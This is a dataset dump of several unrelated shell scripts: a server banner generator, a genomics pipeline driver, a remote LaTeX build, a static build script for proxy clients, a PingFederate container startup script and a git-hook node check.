printf " +-----------------------------------------------------+\n"
printf "      Server OS           ${OS}\n"
printf " +-----------------------------------------------------+\n"
printf "      Server Type         ${TYPE} ${MODEL}\n"
printf " +-----------------------------------------------------+\n"
printf "      Web Server          ${WEB}\n"
printf " +-----------------------------------------------------+\n"
printf "      Firewall            ${FIREWALL}\n"
printf " +-----------------------------------------------------+\n"
EOF
if [ -n "${APP}" ] ; then
cat << EOF >> /etc/profile.d/gwn-show-srv.sh
printf "      Application Server  ${APP}\n"
printf " +-----------------------------------------------------+\n"
EOF
fi
cat << EOF >> /etc/profile.d/gwn-show-srv.sh
printf "      Last Highstate      \$(find /etc/salt/last-highstate.txt -printf '%CY-%Cm-%Cd %Ca %CH:%CM %CZ')\n"
printf "      Auto Highstate      ${AUTO_DAY} hour ${AUTO_HR} quarter ${AUTO_QTR}\n"
printf " +-----------------------------------------------------+\n"
EOF
printf 'printf "\n"\n' >> /etc/profile.d/gwn-show-srv.sh
| true |
83bc1d4d76261eaf9b00c70be587d3bcbd42962f | Shell | pauloluniyi/seaConnect--dDocent | /main.sh | UTF-8 | 1,828 | 2.96875 | 3 | [] | no_license | #########################################################################
### set global variables
## species to process
#SPECIES=$1
SPECIES=mullus
#SPECIES=diplodus
## dDocent
# NOTE(review): the cluster (/entrepot) paths below are immediately
# overwritten by the local (bigvol) ones -- comment one pair out to make
# the intended environment explicit.
CONTAINER=/entrepot/working/seaconnect/seaConnect--dDocent/seaconnect.simg
DDOCENT_CONFIG=/entrepot/working/seaconnect/seaConnect--dDocent/01-infos/ddocent_config.file
CONTAINER=/media/bigvol/eboulanger/seaconnect/seaconnect.simg
DDOCENT_CONFIG=/media/bigvol/eboulanger/seaconnect/01-infos/ddocent_config.file
#########################################################################
### RUN THE WORKFLOW
### create barcode files
# NOTE(review): "00-scripts barcodes.sh" looks like a missing slash
# (00-scripts/barcodes.sh) -- confirm against the repo layout.
bash 00-scripts barcodes.sh "${SPECIES}"
## demultiplexing
#### mullus surmuletus
snakemake -s 00-scripts/snakeFile.process_radtags -j 8 --use-singularity --configfile 01-infos/config_"${SPECIES}".yaml --singularity-args "-B /entrepot:/entrepot"
## clean
#rm -Rf 03-samples/* 10-logs/*
## DEmultiplexing MOnitoring Report Tool
bash 00-script/demort.sh "${SPECIES}" "${CONTAINER}"
## rename
#bash 00-scripts/rename.sh "${SPECIES}" 01-infos/"${SPECIES}"_sample_information.tsv
#### with blacklist
bash 00-scripts/rename.sh "${SPECIES}" 01-infos/"${SPECIES}"_sample_information.tsv 98-metrics/"${SPECIES}"_samples_blacklist.txt
#### add a reference genome fasta file to ddocent folder
ln -s /entrepot/donnees/genomes/"${SPECIES}"_genome.fasta 04-ddocent/"${SPECIES}"/reference.fasta
#### run the workflow "dDocent"
bash 00-scripts/ddocent.sh "${SPECIES}" "${CONTAINER}" "${DDOCENT_CONFIG}"
##filter remove indels
#vcftools --vcf 04-ddocent/"${SPECIES}"/TotalRawSNPs.vcf --remove-indels --recode-INFO-all --recode --out 05-vcf/"${SPECIES}"_snps &>10-logs/vcftools_"${SPECIES}".log
bash 00-scripts/rm_indels.sh "${SPECIES}" "${CONTAINER}"
| true |
9252c174177cad5032887c5a3c8ae6c354673213 | Shell | blizzarac/dotfiles | /bin/docker-latex.sh | UTF-8 | 221 | 2.765625 | 3 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | filename=$2
# $1 is the ssh host to build on; $2 (read into $filename above) is the
# local .tex file to compile remotely inside the blang/latex container.
host=$1
# copy the LaTeX source to the remote home directory
scp "$filename" "$host":~
# BUGFIX: $host and the remote-side $filename were unquoted (shellcheck
# SC2086) — names containing spaces or glob characters would word-split.
# The filename is now wrapped in escaped quotes so it survives the ssh
# round-trip as a single argument to pdflatex.
ssh "$host" 'docker run --rm -i --user="$(id -u):$(id -g)" --net=none -v $PWD:/data blang/latex pdflatex '"\"$filename\""
# strip the .tex extension and fetch the generated PDF back
filename="${filename%.*}"
scp "$host":~/"$filename".pdf .
8bb90471443839971dceb2baac40d63c9f8f40ce | Shell | zzzop/stairspeedtest-reborn | /scripts/build.alpine.clients.sh | UTF-8 | 3,725 | 2.59375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Output directory for the freshly built client binaries.
# FIX: -p creates missing parent directories and makes re-runs idempotent
# (the bare mkdir failed on a second run — and did so before set -e was on,
# masking the error).
mkdir -p base/tools/clients
# Trace every command and abort on the first failure from here on.
set -xe
# Build toolchain.
apk add gcc g++ build-base linux-headers cmake make autoconf automake libtool curl
# Static development libraries required by the clients built below.
apk add openssl-dev openssl-libs-static libev-dev pcre-dev libsodium-dev libsodium-static c-ares-dev libevent-dev libevent-static mbedtls-dev mbedtls-static boost-dev boost-static mariadb-dev mariadb-static
# --- simple-obfs: build a fully static obfs_local binary ---
git clone https://github.com/shadowsocks/simple-obfs --depth=1
cd simple-obfs
git submodule update --init
./autogen.sh
./configure --disable-documentation
make -j4
# Relink the obfs_local object files statically against libev and strip
# symbols (-s); the autotools link step is not static, hence the manual gcc.
gcc $(find src/ -name "obfs_local-*.o") $(find . -name "*.a") -o simple-obfs -static -lev -s
mv simple-obfs ../base/tools/clients/
cd ..
# --- shadowsocks-libev: build a fully static ss-local binary ---
git clone https://github.com/shadowsocks/shadowsocks-libev --depth=1
cd shadowsocks-libev
git submodule update --init
./autogen.sh
./configure --disable-documentation
make -j4
# Manual static relink of the ss_local objects against pcre/mbedtls/ev/sodium,
# stripped with -s.
gcc $(find src/ -name "ss_local-*.o") $(find . -name "*.a") -o ss-local -static -lpcre -lmbedtls -lmbedcrypto -lev -lsodium -s
mv ss-local ../base/tools/clients/
cd ..
# --- shadowsocksr-libev (Akkariiin/develop branch): static ssr-local ---
git clone -b Akkariiin/develop --single-branch --depth=1 https://github.com/shadowsocksrr/shadowsocksr-libev
cd shadowsocksr-libev
# fix codes
# Turn the global const definitions in these headers into extern
# declarations so the static link below does not fail with
# multiple-definition errors.
sed -i "s/^const/extern const/g" src/tls.h
sed -i "s/^const/extern const/g" src/http.h
./autogen.sh
./configure --disable-documentation
make -j4
# Manual static relink against openssl/pcre/ev/sodium, stripped with -s.
gcc $(find src/ -name "ss_local-*.o") $(find . -name "*.a") -o ssr-local -static -lpcre -lssl -lcrypto -lev -lsodium -s
mv ssr-local ../base/tools/clients/
cd ..
# --- trojan: cmake build, then manual static relink ---
git clone https://github.com/trojan-gfw/trojan --depth=1
cd trojan
cmake -DDEFAULT_CONFIG=config.json -DFORCE_TCP_FASTOPEN=ON .
make -j4
# Relink the cmake-produced objects statically (mysqlclient, boost
# program_options, openssl, zlib) and strip symbols.
g++ $(find CMakeFiles/trojan.dir/src/ -name "*.o") -o trojan -static -lmysqlclient -lboost_program_options -lssl -lcrypto -lz -s
mv trojan ../base/tools/clients/
cd ..
# Download prebuilt release archives (v2ray, websocketd, v2ray-plugin)
# matching the target architecture. $ARCH is expected to be set by the
# caller's environment (x86_64 / x86 / aarch64 / armhf); any other value
# downloads nothing — preserved from the original chain.
# IDIOM FIX: the nested "else if ... fi fi fi fi" ladder is flattened into
# a single if/elif chain with identical behavior.
if [[ "$ARCH" = "x86_64" ]]; then
    curl -LO https://github.com/v2fly/v2ray-core/releases/latest/download/v2ray-linux-64.zip
    curl -LO https://github.com/joewalnes/websocketd/releases/download/v0.4.1/websocketd-0.4.1-linux_amd64.zip
    curl -LO https://github.com/shadowsocks/v2ray-plugin/releases/download/v1.3.1/v2ray-plugin-linux-amd64-v1.3.1.tar.gz
elif [[ "$ARCH" = "x86" ]]; then
    curl -LO https://github.com/v2fly/v2ray-core/releases/latest/download/v2ray-linux-32.zip
    curl -LO https://github.com/joewalnes/websocketd/releases/download/v0.4.1/websocketd-0.4.1-linux_386.zip
    curl -LO https://github.com/shadowsocks/v2ray-plugin/releases/download/v1.3.1/v2ray-plugin-linux-386-v1.3.1.tar.gz
elif [[ "$ARCH" = "aarch64" ]]; then
    curl -LO https://github.com/joewalnes/websocketd/releases/download/v0.4.1/websocketd-0.4.1-linux_arm64.zip
    curl -LO https://github.com/v2fly/v2ray-core/releases/latest/download/v2ray-linux-arm64-v8a.zip
    curl -LO https://github.com/shadowsocks/v2ray-plugin/releases/download/v1.3.1/v2ray-plugin-linux-arm64-v1.3.1.tar.gz
elif [[ "$ARCH" = "armhf" ]]; then
    curl -LO https://github.com/joewalnes/websocketd/releases/download/v0.4.1/websocketd-0.4.1-linux_arm.zip
    curl -LO https://github.com/v2fly/v2ray-core/releases/latest/download/v2ray-linux-arm32-v7a.zip
    curl -LO https://github.com/shadowsocks/v2ray-plugin/releases/download/v1.3.1/v2ray-plugin-linux-arm-v1.3.1.tar.gz
fi
# Extract only the binaries we ship from the downloaded archives.
unzip v2ray*.zip v2ray v2ctl
unzip websocketd*.zip websocketd
# The armhf plugin tarball names its binary ..._arm7; other architectures
# use the archive's default member name.
if [[ "$ARCH" = "armhf" ]];then
tar xvf v2ray-plugin*.gz v2ray-plugin_linux_arm7
else
tar xvf v2ray-plugin*.gz
fi
strip -s websocketd
# Install into the release layout (plugin is renamed to a fixed name) and
# make everything readable/executable.
mv v2ray-plugin_* base/tools/clients/v2ray-plugin
mv v2ray base/tools/clients/
mv v2ctl base/tools/clients/
mv websocketd base/tools/gui/
chmod +rx base/tools/clients/* base/tools/gui/websocketd
| true |
90e64fd447be4ae9beffefe57caf9ae4cb3b90b2 | Shell | jonlehtinen/pfadmin_pfengine_ubuntu | /PingFederate/docker-build-files/pingfederate/bin/startup.sh | UTF-8 | 332 | 2.5625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# PingFederate container entrypoint.
# Environment (set by the image / orchestrator — TODO confirm against the
# Dockerfile, not visible here):
#   NODE_ROLE - "CLUSTERED_CONSOLE" for the admin node, engine otherwise
#   DATA_HOME - S3 location holding the configuration archive
#   PF_HOME   - PingFederate install root
# BUGFIX: all expansions are now quoted. The original unquoted
# [ $NODE_ROLE = ... ] test crashes with "unary operator expected" when
# NODE_ROLE is unset/empty, and unquoted paths word-split (SC2086).
# Console node: stage the exported config where the drop-in-deployer
# picks it up on boot.
if [ "$NODE_ROLE" = "CLUSTERED_CONSOLE" ] ; then
  aws s3 cp "$DATA_HOME/data.zip" "$PF_HOME/server/default/data/drop-in-deployer/data.zip"
fi
# Start PingFederate in the background.
"$PF_HOME/bin/run.sh" &
# Console node: after startup, replicate config to the cluster, then run
# an export pass later (the sleeps mirror the original timings).
if [ "$NODE_ROLE" = "CLUSTERED_CONSOLE" ] ; then
  sleep 120
  "$PF_HOME/bin/replicate.sh" &
  sleep 1680
  "$PF_HOME/bin/export.sh" &
fi
# Keep PID 1 alive so the container does not exit.
sleep infinity
75bcd1cbef8128330f3872d4ea61aff553490c1b | Shell | zhaosaisai/test-changelog | /check_command.sh | UTF-8 | 271 | 3.140625 | 3 | [] | no_license | #!/bin/sh
#yorkie 2.0.0
# Git hook guard: skip the hook gracefully when node is unavailable.
# Return success (0) iff the given command is available on PATH.
#   $1 - command name to probe
command_exists () {
  command -v "$1" >/dev/null 2>&1
}
# check command node is exist? for git-cz command
# If node is missing, print a notice and exit 0 so the git operation is
# not blocked by the hook.
check_node () {
  command_exists node || {
    echo
    # BUGFIX: reworded the broken-English user-facing message
    # (was: "command 'node' is not exists and skip the hook").
    echo "command 'node' does not exist; skipping the hook"
    exit 0
  }
}
check_node
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.